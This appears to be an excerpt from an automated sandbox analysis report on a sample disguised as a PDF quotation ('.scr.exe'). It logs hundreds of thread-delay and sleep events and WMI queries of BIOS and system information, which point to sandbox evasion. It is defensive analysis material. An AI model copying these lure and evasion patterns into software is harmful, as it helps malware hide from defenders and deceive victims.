Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594438	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594313	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594188	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 593809	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 593636	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594516	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Window / User API: threadDelayed 2229	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Window / User API: threadDelayed 7553	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 1631	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 8222	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -599828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7388	Thread sleep count: 2229 > 30	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7388	Thread sleep count: 7553 > 30	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -599714s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -599578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -599469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -599356s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -599084s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -598953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -598734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -598625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -598516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -598406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -598297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -598187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -598071s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -597953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -597844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -597734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -597625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -597515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -597406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -597297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -597187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -597077s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -596969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -596853s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -596727s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -596499s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -596390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -596279s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -596172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -596063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -595938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -595813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -595688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -595563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -595442s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -595313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -595203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -595094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -594984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -594875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -594766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -594656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -594547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -594438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -594313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -594188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -593809s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe TID: 7384	Thread sleep time: -593636s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -21213755684765971s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7956	Thread sleep count: 1631 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7956	Thread sleep count: 8222 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -598891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -598563s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -598438s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -598313s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -598188s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -598078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -597969s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -597844s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -597734s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -597625s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -597515s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -597406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -597297s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -597187s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -597078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -596969s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -596844s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -596734s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -596625s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -596516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -596406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -596297s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -596187s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -596078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -595969s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -595859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -595750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -595641s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -595516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -595391s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -595281s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -595172s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -595062s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -594953s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -594844s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -594734s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -594625s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7952	Thread sleep time: -594516s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 599828	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 599714	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 599578	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 599469	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 599356	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 599084	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598187	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598071	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597077	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596853	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596727	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596499	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596279	Jump to behavior
